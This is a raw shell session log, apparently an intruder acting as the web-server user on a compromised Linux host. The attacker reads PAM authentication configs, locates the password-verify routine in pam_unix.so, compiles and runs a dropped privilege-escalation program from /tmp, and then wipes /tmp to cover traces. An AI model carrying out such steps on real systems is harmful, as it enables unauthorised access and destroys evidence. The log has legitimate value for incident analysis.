# Disallows root logins except on tty's listed in /etc/securetty
# (Replaces the `CONSOLE' setting from login.defs)
auth       requisite  pam_securetty.so
# Disallows other than root logins when /etc/nologin exists
# (Replaces the `NOLOGINS_FILE' option from login.defs)
auth       requisite  pam_nologin.so
# This module parses /etc/environment (the standard for setting
# environ vars) and also allows you to use an extended config
# file /etc/security/pam_env.conf.
# (Replaces the `ENVIRON_FILE' setting from login.defs)
auth       required   pam_env.so
# Standard Un*x authentication. The "nullok" line allows passwordless
# accounts.
auth       required   pam_unix.so nullok
# This allows certain extra groups to be granted to a user
# based on things like time of day, tty, service, and user.
# Please uncomment and edit /etc/security/group.conf if you
# wish to use this.
# (Replaces the `CONSOLE_GROUPS' option in login.defs)
# auth       optional   pam_group.so
# Uncomment and edit /etc/security/time.conf if you need to set
# time restrainst on logins.
# (Replaces the `PORTTIME_CHECKS_ENAB' option from login.defs
# as well as /etc/porttime)
# account    requisite  pam_time.so
# Uncomment and edit /etc/security/access.conf if you need to
# set access limits.
# (Replaces /etc/login.access file)
# account  required       pam_access.so
# Standard Un*x account and session
account    required   pam_unix.so
session    required   pam_unix.so
# Sets up user limits, please uncomment and read /etc/security/limits.conf
# to enable this functionality.
# (Replaces the use of /etc/limits in old login)
# session    required   pam_limits.so
# Prints the last login info upon succesful login
# (Replaces the `LASTLOG_ENAB' option from login.defs)
session    optional   pam_lastlog.so
# Prints the motd upon succesful login
# (Replaces the `MOTD_FILE' option in login.defs)
session    optional   pam_motd.so
# Prints the status of the user's mailbox upon succesful login
# (Replaces the `MAIL_CHECK_ENAB' option from login.defs). You
# can also enable a MAIL environment variable from here, but it
# is better handled by /etc/login.defs, since userdel also uses
# it to make sure that removing a user, also removes their mail
# spool file.
session    optional   pam_mail.so standard noenv
# The standard Unix authentication modules, used with NIS (man nsswitch) as
# well as normal /etc/passwd and /etc/shadow entries. For the login service,
# this is only used when the password expires and must be changed, so make
# sure this one and the one in /etc/pam.d/passwd are the same. The "nullok"
# option allows users to change an empty password, else empty passwords are
# treated as locked accounts.
# (Add `md5' after the module name to enable MD5 passwords the same way that
# `MD5_CRYPT_ENAB' would do under login.defs).
# The "obscure" option replaces the old `OBSCURE_CHECKS_ENAB' option in
# login.defs. Also the "min" and "max" options enforce the length of the
# new password.
password   required   pam_unix.so nullok obscure min=4 max=8 md5
# Alternate strength checking for password. Note that this
# requires the libpam-cracklib package to be installed.
# You will need to comment out the password line above and
# uncomment the next two in order to use this.
# (Replaces the `OBSCURE_CHECKS_ENAB', `CRACKLIB_DICTPATH')
# password required       pam_cracklib.so retry=3 minlen=6 difok=3
# password required       pam_unix.so use_authtok nullok md5
$ cat /etc/pam.d/ssh
#%PAM-1.0
auth       required     pam_nologin.so
auth       required     pam_unix.so
auth       required     pam_env.so # [1]
account    required     pam_unix.so
session    required     pam_unix.so
session    optional     pam_lastlog.so # [1]
session    optional     pam_motd.so # [1]
session    optional     pam_mail.so standard noenv # [1]
session    required     pam_limits.so
password   required     pam_unix.so
# Alternate strength checking for password. Note that this
# requires the libpam-cracklib package to be installed.
# You will need to comment out the password line above and
# uncomment the next two in order to use this.
# password required       pam_cracklib.so retry=3 minlen=6 difok=3
# password required       pam_unix.so use_authtok nullok md5
$ objdump -R /lib/security/pam_unix.so | grep veri
0000acb0 R_386_JUMP_SLOT   _unix_verify_password
$ ls -l /tmp
total 8
-rw-r--r--    1 www-data www-data     5095 May 13 14:08 ptr2.txt
$ cd /tmp; mv ptr2.txt ptr.c; gcc -o ptr ptr.c
$ /tmp/ptr 2>&1
$ netstat -an
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 0.0.0.0:5222            0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:5223            0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:587             0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:22000           0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:5269            0.0.0.0:*               LISTEN
tcp        0      0 10.0.1.1:53             0.0.0.0:*               LISTEN
tcp        0      0 216.250.201.195:53      0.0.0.0:*               LISTEN
tcp        0      0 127.0.0.1:53            0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:25              0.0.0.0:*               LISTEN
tcp        0      0 127.0.0.1:953           0.0.0.0:*               LISTEN
tcp        0    991 216.250.201.195:80      213.139.47.84:22951     ESTABLISHED
tcp        0    337 216.250.201.195:80      213.139.47.84:20197     FIN_WAIT1
udp        0      0 0.0.0.0:32768           0.0.0.0:*
udp        0      0 0.0.0.0:32769           0.0.0.0:*
udp        0      0 127.0.0.1:921           0.0.0.0:*
udp        0      0 10.0.1.1:53             0.0.0.0:*
udp        0      0 216.250.201.195:53      0.0.0.0:*
udp        0      0 127.0.0.1:53            0.0.0.0:*
Active UNIX domain sockets (servers and established)
Proto RefCnt Flags       Type       State         I-Node Path
unix  2      [ ACC ]     STREAM     LISTENING     592    /var/run/sendmail/mta/smcontrol
unix  6      [ ]         DGRAM                    343    /dev/log
unix  2      [ ]         DGRAM                    589
unix  2      [ ]         DGRAM                    454
unix  2      [ ]         DGRAM                    397
unix  2      [ ]         DGRAM                    392
$ /tmp/ptr
$ netstat -an
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 0.0.0.0:5222            0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:5223            0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:587             0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:22000           0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:5269            0.0.0.0:*               LISTEN
tcp        0      0 10.0.1.1:53             0.0.0.0:*               LISTEN
tcp        0      0 216.250.201.195:53      0.0.0.0:*               LISTEN
tcp        0      0 127.0.0.1:53            0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:25              0.0.0.0:*               LISTEN
tcp        0      0 127.0.0.1:953           0.0.0.0:*               LISTEN
tcp        0    991 216.250.201.195:80      213.139.47.84:24794     ESTABLISHED
tcp        0   2512 216.250.201.195:80      213.139.47.84:22951     FIN_WAIT1
tcp        0    337 216.250.201.195:80      213.139.47.84:20197     FIN_WAIT1
udp        0      0 0.0.0.0:32768           0.0.0.0:*
udp        0      0 0.0.0.0:32769           0.0.0.0:*
udp        0      0 127.0.0.1:921           0.0.0.0:*
udp        0      0 10.0.1.1:53             0.0.0.0:*
udp        0      0 216.250.201.195:53      0.0.0.0:*
udp        0      0 127.0.0.1:53            0.0.0.0:*
Active UNIX domain sockets (servers and established)
Proto RefCnt Flags       Type       State         I-Node Path
unix  2      [ ACC ]     STREAM     LISTENING     592    /var/run/sendmail/mta/smcontrol
unix  6      [ ]         DGRAM                    343    /dev/log
unix  2      [ ]         DGRAM                    589
unix  2      [ ]         DGRAM                    454
unix  2      [ ]         DGRAM                    397
unix  2      [ ]         DGRAM                    392
$ ls -l /tmp
total 16
-rwxr-xr-x    1 www-data www-data     7843 May 20 13:14 ptr
-rw-r--r--    1 www-data www-data     5095 May 13 14:08 ptr.c
$ rm -rf /tmp/*
$ ls -l /tmp
total 0
$ exit
$ id
$ exit
$ id
$ exit
